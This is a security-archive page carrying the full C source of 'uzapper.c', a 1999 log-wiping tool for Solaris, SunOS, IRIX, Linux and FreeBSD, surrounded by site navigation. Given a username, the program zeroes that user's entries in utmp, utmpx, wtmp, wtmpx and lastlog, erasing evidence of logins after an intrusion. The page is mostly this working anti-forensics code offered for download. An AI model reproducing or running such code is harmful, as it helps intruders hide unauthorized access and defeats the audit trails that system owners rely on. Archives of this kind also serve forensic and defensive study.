uzapper.c

uzapper.c: Posted Nov 5, 1999; Authored by shadowpenguin; This is the general log wiper for Solaris, SunOS, IRIX, Linux, FreeBSD.; systems | linux, unix, solaris, freebsd, irix; SHA-256 | 005023c66ef99e3f03ac1e3670464cdaa9c46893d30f92fcb7f5605e2eb682fa; Download | Favorite | View

uzapper.c

/*=============================================================================
   UZAPPER Ver1.00 for Solaris, SunOS, IRIX, Linux, FreeBSD
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (unewn4th@usa.net)
  =============================================================================
*/

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <utmp.h>

#ifdef  UTMAXTYPE
#define UTMPX
#include <utmpx.h>
#endif
#include <pwd.h>
#ifndef _PATH_LASTLOG
#include <lastlog.h>
#endif
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/utsname.h>

#define SVR4_UTMP       "/var/adm/utmp" 
#define SVR4_WTMP       "/var/adm/wtmp" 
#define SVR4_LASTLOG    "/var/adm/lastlog" 

#define SUNOS4_UTMP     "/etc/utmp" 
#define SUNOS4_WTMP     "/usr/adm/wtmp" 
#define SUNOS4_LASTLOG  "/usr/adm/lastlog" 

#define BSD_UTMP        "/var/run/utmp"
#define BSD_WTMP        "/var/log/wtmp"
#define BSD_LASTLOG     "/var/log/lastlog" 

#define MAX_FPATH       512

int     wipe_log(path,user,type)
char    *path,*user; 
int     type;
{ 
    struct utmp     utmp_ent; 
#ifdef UTMPX
    struct utmpx    utmpx_ent;
#endif
    void            *ent;
    char            *un;
    int             sz,fd,c=0;

    if (strlen(path)==0) return(1);
    if (type==0){
        ent=(void *)&utmp_ent;
#ifdef UTMPX
        un=(char *)&utmp_ent.ut_user;
#else
        un=(char *)&utmp_ent.ut_name;
#endif
        sz=sizeof(struct utmp); 
    }else{
#ifdef UTMPX
        ent=(void *)&utmpx_ent;
        un=(char *)&utmpx_ent.ut_user;
        sz=sizeof(struct utmpx);
#endif
    }
    if ((fd=open(path,O_RDWR))<=0) return(-1);
    while(read(fd,ent,sz)>0)
        if (!strncmp(un,user,strlen(user))){
            memset(ent,0,sz);
            lseek(fd,-sz,SEEK_CUR);
            write(fd,ent,sz);
            c++;
        }
    close(fd);
    printf("Wiped %d entries of %s from %s.\n",c,user,path);
    return(0);
} 

int     wipe_lastlog(path,user,type) 
char    *path,*user; 
int     type;
{ 
    struct passwd   *p; 
    struct lastlog  ent; 
    int             fd;
    char            buffer[MAX_FPATH];

    if (type==0) strcpy(buffer,path);
    else sprintf(buffer,"%s/%s",path,user);
    memset(&ent,0,sizeof(struct lastlog));
    if ((p=getpwnam(user))==NULL) return(-1);
    if ((fd=open(buffer,O_RDWR))<=0) return(-2);
    if (type==0)
        lseek(fd,p->pw_uid*sizeof(struct lastlog),SEEK_SET); 
    write(fd,&ent,sizeof(struct lastlog)); 
    close(fd); 
    printf("Wiped %s from %s.\n",user,path);
    return(0);
} 

main(argc,argv) 
int     argc;
char    *argv[];
{
    char    f_utmp[MAX_FPATH],f_utmpx[MAX_FPATH];
    char    f_wtmp[MAX_FPATH],f_wtmpx[MAX_FPATH];
    char    f_lastlog[MAX_FPATH];
    struct utsname  utname;
    int     lastlog_type;

    if (argc!=2){
        printf("Usage: %s Usernane\n",argv[0]);
        exit(1);
    } 
    if (getpwnam(argv[1])==NULL){
        printf("Unknown user : %s\n",argv[1]);
        exit(1);
    }
    uname(&utname);
    strcpy(f_wtmpx,""); strcpy(f_utmpx,"");
    if (!strcmp(utname.sysname,"SunOS")){
#ifdef UTMPX
            strcpy(f_utmp,    SVR4_UTMP);
            strcpy(f_wtmp,    SVR4_WTMP);
            strcpy(f_utmpx,   UTMPX_FILE);
            strcpy(f_wtmpx,   WTMPX_FILE);
            strcpy(f_lastlog, SVR4_LASTLOG);
            lastlog_type=0;
#else
            strcpy(f_utmp,    SUNOS4_UTMP);
            strcpy(f_wtmp,    SUNOS4_WTMP);
            strcpy(f_lastlog, SUNOS4_LASTLOG);
            lastlog_type=0;
#endif
    }else if (!strcmp(utname.sysname,"Linux")
           || !strcmp(utname.sysname,"FreeBSD")){
            strcpy(f_utmp,    BSD_UTMP);
            strcpy(f_wtmp,    BSD_WTMP);
            strcpy(f_lastlog, BSD_LASTLOG);
    }else if (!strcmp(utname.sysname,"IRIX")){
#ifdef UTMPX
            strcpy(f_utmp,    SVR4_UTMP);
            strcpy(f_wtmp,    SVR4_WTMP);
            strcpy(f_utmpx,   UTMPX_FILE);
            strcpy(f_wtmpx,   WTMPX_FILE);
            strcpy(f_lastlog, SVR4_LASTLOG);
            lastlog_type=1;
#else
            printf("Can not wipe. System Unknown.\n");
#endif
    }else
            printf("Can not wipe. System Unknown.\n");

    wipe_log(f_utmp, argv[1],0);
    wipe_log(f_utmpx,argv[1],1);
    wipe_log(f_wtmp, argv[1],0);
    wipe_log(f_wtmpx,argv[1],1);
    wipe_lastlog(f_lastlog,argv[1],lastlog_type);
}

Top Authors In Last 30 Days

Red Hat 227 files
indoushka 150 files
Jay Turla 150 files
Ubuntu 64 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,119)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,136)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,775)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,828)
UNIX (9,454)
UnixWare (188)
Windows (6,766)
Other

uzapper.c

uzapper.c

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

uzapper.c

Share This

uzapper.c

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems